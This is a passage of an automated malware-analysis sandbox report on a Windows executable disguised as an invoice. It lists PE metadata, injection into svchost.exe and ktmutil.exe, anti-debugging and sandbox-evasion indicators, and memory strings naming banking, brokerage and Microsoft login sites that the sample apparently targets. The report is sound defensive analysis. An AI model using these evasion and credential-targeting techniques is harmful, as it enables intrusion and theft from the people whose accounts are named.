                Source: ORIGINAL INVOICE COAU7230734290.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: ORIGINAL INVOICE COAU7230734290.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: ORIGINAL INVOICE COAU7230734290.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: ORIGINAL INVOICE COAU7230734290.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: ORIGINAL INVOICE COAU7230734290.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: tOxaspWNamv.exe, 00000008.00000002.3405222238.0000000000F7E000.00000002.00000001.01000000.00000005.sdmp, tOxaspWNamv.exe, 0000000E.00000002.3409614358.0000000000F7E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: ORIGINAL INVOICE COAU7230734290.exe, 00000002.00000003.2165458850.00000000034B0000.00000004.00001000.00020000.00000000.sdmp, ORIGINAL INVOICE COAU7230734290.exe, 00000002.00000003.2163294510.0000000003600000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2493451391.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.2391635779.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2493451391.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.2389578275.0000000003600000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 0000000B.00000003.2502109866.0000000002E7F000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 0000000B.00000003.2504208467.0000000003028000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 0000000B.00000002.3412179263.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 0000000B.00000002.3412179263.000000000336E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: srdelayed.pdbGCTL source: tOxaspWNamv.exe, 00000008.00000003.2433589740.0000000000C7B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: ORIGINAL INVOICE COAU7230734290.exe, 00000002.00000003.2165458850.00000000034B0000.00000004.00001000.00020000.00000000.sdmp, ORIGINAL INVOICE COAU7230734290.exe, 00000002.00000003.2163294510.0000000003600000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000004.00000002.2493451391.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.2391635779.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2493451391.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.2389578275.0000000003600000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, ktmutil.exe, 0000000B.00000003.2502109866.0000000002E7F000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 0000000B.00000003.2504208467.0000000003028000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 0000000B.00000002.3412179263.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 0000000B.00000002.3412179263.000000000336E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: ktmutil.pdbGCTL source: svchost.exe, 00000004.00000002.2493286869.0000000003412000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2493265316.0000000003400000.00000004.00000020.00020000.00000000.sdmp, tOxaspWNamv.exe, 00000008.00000003.2434247222.0000000000C7B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: ktmutil.pdb source: svchost.exe, 00000004.00000002.2493286869.0000000003412000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2493265316.0000000003400000.00000004.00000020.00020000.00000000.sdmp, tOxaspWNamv.exe, 00000008.00000003.2434247222.0000000000C7B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: srdelayed.pdb source: tOxaspWNamv.exe, 00000008.00000003.2433589740.0000000000C7B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: ktmutil.exe, 0000000B.00000002.3402567248.0000000002D83000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 0000000B.00000002.3412669118.00000000037FC000.00000004.10000000.00040000.00000000.sdmp, tOxaspWNamv.exe, 0000000E.00000000.2571842961.000000000268C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.2799096462.000000001763C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: ktmutil.exe, 0000000B.00000002.3402567248.0000000002D83000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 0000000B.00000002.3412669118.00000000037FC000.00000004.10000000.00040000.00000000.sdmp, tOxaspWNamv.exe, 0000000E.00000000.2571842961.000000000268C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.2799096462.000000001763C000.00000004.80000000.00040000.00000000.sdmp
                Source: ORIGINAL INVOICE COAU7230734290.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: ORIGINAL INVOICE COAU7230734290.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: ORIGINAL INVOICE COAU7230734290.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: ORIGINAL INVOICE COAU7230734290.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: ORIGINAL INVOICE COAU7230734290.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe Code function: 2_2_0020E01E LoadLibraryA,GetProcAddress, 2_2_0020E01E
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe Code function: 2_2_0020288B push 66002023h; retn 0026h 2_2_002028E1
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe Code function: 2_2_00216B05 push ecx; ret 2_2_00216B18
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_00416096 push eax; ret 4_2_004160E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_004168B9 push 49A0F8CEh; ret 4_2_00416912
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_004160BB push eax; ret 4_2_004160E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_00416970 push 49A0F8CEh; ret 4_2_00416912
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0041692F push 49A0F8CEh; ret 4_2_00416912
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_004049B6 push cs; iretd 4_2_004049BA
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_004032E0 push eax; ret 4_2_004032E2
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_00415A90 push ds; retf 4_2_00415A93
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0041938B push ecx; retf 4_2_004193EC
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_00411BB6 push ecx; retf 4_2_00411BB8
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_004065E5 push cs; ret 4_2_004065F0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_00404E33 push ds; iretd 4_2_00404E63
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0040D6C1 push ebp; retf 4_2_0040D6CA
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_00404E91 push ds; iretd 4_2_00404E63
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03A309AD push ecx; mov dword ptr [esp], ecx 4_2_03A309B6
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe Code function: 8_2_0495E48B push ecx; ret 8_2_0495E4C9
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe Code function: 8_2_0496CCBD push eax; ret 8_2_0496CD10
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe Code function: 8_2_0496CCE2 push eax; ret 8_2_0496CD10
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe Code function: 8_2_0496D4E0 push 49A0F8CEh; ret 8_2_0496D539
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe Code function: 8_2_0495E40F push ecx; ret 8_2_0495E4C9
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe Code function: 8_2_0496D597 push 49A0F8CEh; ret 8_2_0496D539
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe Code function: 8_2_0495B5DD push cs; iretd 8_2_0495B5E1
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe Code function: 8_2_0495E517 push ecx; ret 8_2_0495E4C9
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe Code function: 8_2_0496D556 push 49A0F8CEh; ret 8_2_0496D539
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe Code function: 8_2_0496C6B7 push ds; retf 8_2_0496C6BA
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe Code function: 8_2_0495BAB8 push ds; iretd 8_2_0495BA8A
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe Code function: 8_2_0495C6FE push ss; retf 8_2_0495C701
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe Code function: 8_2_049642E8 push ebp; retf 8_2_049642F1
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe Code function: 8_2_0495D20C push cs; ret 8_2_0495D217
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe Code function: 2_2_00258111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 2_2_00258111
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe Code function: 2_2_0020EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 2_2_0020EB42
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe Code function: 2_2_0021123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 2_2_0021123A
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\ktmutil.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\ktmutil.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\ktmutil.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\ktmutil.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\ktmutil.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe API/Special instruction interceptor: Address: E27D6C
                Source: C:\Windows\SysWOW64\ktmutil.exe API/Special instruction interceptor: Address: 7FFDB442D324
                Source: C:\Windows\SysWOW64\ktmutil.exe API/Special instruction interceptor: Address: 7FFDB442D7E4
                Source: C:\Windows\SysWOW64\ktmutil.exe API/Special instruction interceptor: Address: 7FFDB442D944
                Source: C:\Windows\SysWOW64\ktmutil.exe API/Special instruction interceptor: Address: 7FFDB442D504
                Source: C:\Windows\SysWOW64\ktmutil.exe API/Special instruction interceptor: Address: 7FFDB442D544
                Source: C:\Windows\SysWOW64\ktmutil.exe API/Special instruction interceptor: Address: 7FFDB442D1E4
                Source: C:\Windows\SysWOW64\ktmutil.exe API/Special instruction interceptor: Address: 7FFDB4430154
                Source: C:\Windows\SysWOW64\ktmutil.exe API/Special instruction interceptor: Address: 7FFDB442DA44
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03A7096E rdtsc 4_2_03A7096E
                Source: C:\Windows\SysWOW64\ktmutil.exe Window / User API: threadDelayed 9695
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe Evaded block: after key decision graph_2-92966
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_2-93736
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe API coverage: 4.5 %
                Source: C:\Windows\SysWOW64\svchost.exe API coverage: 0.7 %
                Source: C:\Windows\SysWOW64\ktmutil.exe API coverage: 2.6 %
                Source: C:\Windows\SysWOW64\ktmutil.exe TID: 2364 Thread sleep count: 279 > 30
                Source: C:\Windows\SysWOW64\ktmutil.exe TID: 2364 Thread sleep time: -558000s >= -30000s
                Source: C:\Windows\SysWOW64\ktmutil.exe TID: 2364 Thread sleep count: 9695 > 30
                Source: C:\Windows\SysWOW64\ktmutil.exe TID: 2364 Thread sleep time: -19390000s >= -30000s
                Source: C:\Windows\SysWOW64\ktmutil.exe Last function: Thread delayed
                Source: C:\Windows\SysWOW64\ktmutil.exe Last function: Thread delayed
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe Code function: 2_2_00236CA9 GetFileAttributesW,FindFirstFileW,FindClose, 2_2_00236CA9
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe Code function: 2_2_002360DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose, 2_2_002360DD
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe Code function: 2_2_002363F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose, 2_2_002363F9
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe Code function: 2_2_0023EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 2_2_0023EB60
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe Code function: 2_2_0023F56F FindFirstFileW,FindClose, 2_2_0023F56F
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe Code function: 2_2_0023F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 2_2_0023F5FA
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe Code function: 2_2_00241B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 2_2_00241B2F
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe Code function: 2_2_00241C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 2_2_00241C8A
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe Code function: 2_2_00241F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 2_2_00241F94
                Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 11_2_0279C810 FindFirstFileW,FindNextFileW,FindClose, 11_2_0279C810
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe Code function: 2_2_0020DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo, 2_2_0020DDC0
                Source: 283026M3L.11.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                Source: ktmutil.exe, 0000000B.00000002.3414498574.0000000007A97000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,116
                Source: 283026M3L.11.dr Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
                Source: 283026M3L.11.dr Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                Source: ktmutil.exe, 0000000B.00000002.3414498574.0000000007A97000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rtal.azure.comVMware20,11696487552
                Source: 283026M3L.11.dr Binary or memory string: discord.comVMware20,11696487552f
                Source: 283026M3L.11.dr Binary or memory string: bankofamerica.comVMware20,11696487552x
                Source: 283026M3L.11.dr Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
                Source: 283026M3L.11.dr Binary or memory string: ms.portal.azure.comVMware20,11696487552
                Source: ktmutil.exe, 0000000B.00000002.3414498574.0000000007A97000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: .comVMware20,11696487552x
                Source: ktmutil.exe, 0000000B.00000002.3414498574.0000000007A97000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ansaction PasswordVMware20,11696487552
                Source: ktmutil.exe, 0000000B.00000002.3414498574.0000000007A97000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware20,11696487552n
                Source: 283026M3L.11.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                Source: 283026M3L.11.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                Source: 283026M3L.11.dr Binary or memory string: global block list test formVMware20,11696487552
                Source: 283026M3L.11.dr Binary or memory string: tasks.office.comVMware20,11696487552o
                Source: 283026M3L.11.dr Binary or memory string: AMC password management pageVMware20,11696487552
                Source: ktmutil.exe, 0000000B.00000002.3402567248.0000000002D83000.00000004.00000020.00020000.00000000.sdmp, tOxaspWNamv.exe, 0000000E.00000002.3403128496.000000000045A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 283026M3L.11.dr Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
                Source: ktmutil.exe, 0000000B.00000002.3414498574.0000000007A97000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: l.comVMware20,11696487552h
                Source: 283026M3L.11.dr Binary or memory string: interactivebrokers.comVMware20,11696487552
                Source: 283026M3L.11.dr Binary or memory string: dev.azure.comVMware20,11696487552j
                Source: 283026M3L.11.dr Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
                Source: 283026M3L.11.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                Source: ktmutil.exe, 0000000B.00000002.3414498574.0000000007A97000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware20,11696487552~
                Source: firefox.exe, 00000010.00000002.2800681356.000001C39761C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
                Source: ktmutil.exe, 0000000B.00000002.3414498574.0000000007A97000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: block list test formVMware20,1169648755
                Source: 283026M3L.11.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
                Source: ktmutil.exe, 0000000B.00000002.3414498574.0000000007A97000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tion PasswordVMware20,11696487552}
                Source: 283026M3L.11.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                Source: 283026M3L.11.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                Source: 283026M3L.11.dr Binary or memory string: outlook.office365.comVMware20,11696487552t
                Source: 283026M3L.11.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                Source: ktmutil.exe, 0000000B.00000002.3414498574.0000000007A97000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,
                Source: 283026M3L.11.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                Source: 283026M3L.11.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                Source: 283026M3L.11.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                Source: 283026M3L.11.dr Binary or memory string: outlook.office.comVMware20,11696487552s
                Source: 283026M3L.11.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                Source: 283026M3L.11.dr Binary or memory string: turbotax.intuit.comVMware20,11696487552t
                Source: 283026M3L.11.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
                Source: 283026M3L.11.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
                Source: 283026M3L.11.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe API call chain: ExitProcess graph end node graph_2-92623
                Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\ktmutil.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03A7096E rdtsc 4_2_03A7096E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_00417A83 LdrLoadDll, 4_2_00417A83
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe Code function: 2_2_00246AAF BlockInput, 2_2_00246AAF
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe Code function: 2_2_001F3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 2_2_001F3D19
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe Code function: 2_2_00223920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW, 2_2_00223920
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe Code function: 2_2_0020E01E LoadLibraryA,GetProcAddress, 2_2_0020E01E
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe Code function: 2_2_00E28038 mov eax, dword ptr fs:[00000030h] 2_2_00E28038
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe Code function: 2_2_00E269B8 mov eax, dword ptr fs:[00000030h] 2_2_00E269B8
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe Code function: 2_2_00E27FD8 mov eax, dword ptr fs:[00000030h] 2_2_00E27FD8
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03A2E388 mov eax, dword ptr fs:[00000030h] 4_2_03A2E388
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03A2E388 mov eax, dword ptr fs:[00000030h] 4_2_03A2E388
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03A2E388 mov eax, dword ptr fs:[00000030h] 4_2_03A2E388
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03A5438F mov eax, dword ptr fs:[00000030h] 4_2_03A5438F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03A5438F mov eax, dword ptr fs:[00000030h] 4_2_03A5438F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03A28397 mov eax, dword ptr fs:[00000030h] 4_2_03A28397
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03A28397 mov eax, dword ptr fs:[00000030h] 4_2_03A28397
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03A28397 mov eax, dword ptr fs:[00000030h] 4_2_03A28397
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03A403E9 mov eax, dword ptr fs:[00000030h] 4_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03A403E9 mov eax, dword ptr fs:[00000030h] 4_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03A403E9 mov eax, dword ptr fs:[00000030h] 4_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03A403E9 mov eax, dword ptr fs:[00000030h] 4_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03A403E9 mov eax, dword ptr fs:[00000030h] 4_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03A403E9 mov eax, dword ptr fs:[00000030h] 4_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03A403E9 mov eax, dword ptr fs:[00000030h] 4_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03A403E9 mov eax, dword ptr fs:[00000030h] 4_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03A4E3F0 mov eax, dword ptr fs:[00000030h] 4_2_03A4E3F0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03A4E3F0 mov eax, dword ptr fs:[00000030h] 4_2_03A4E3F0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03A4E3F0 mov eax, dword ptr fs:[00000030h] 4_2_03A4E3F0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03A663FF mov eax, dword ptr fs:[00000030h] 4_2_03A663FF
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03AEC3CD mov eax, dword ptr fs:[00000030h] 4_2_03AEC3CD
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03A3A3C0 mov eax, dword ptr fs:[00000030h] 4_2_03A3A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03A3A3C0 mov eax, dword ptr fs:[00000030h] 4_2_03A3A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03A3A3C0 mov eax, dword ptr fs:[00000030h] 4_2_03A3A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03A3A3C0 mov eax, dword ptr fs:[00000030h] 4_2_03A3A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03A3A3C0 mov eax, dword ptr fs:[00000030h] 4_2_03A3A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03A3A3C0 mov eax, dword ptr fs:[00000030h] 4_2_03A3A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03A383C0 mov eax, dword ptr fs:[00000030h] 4_2_03A383C0
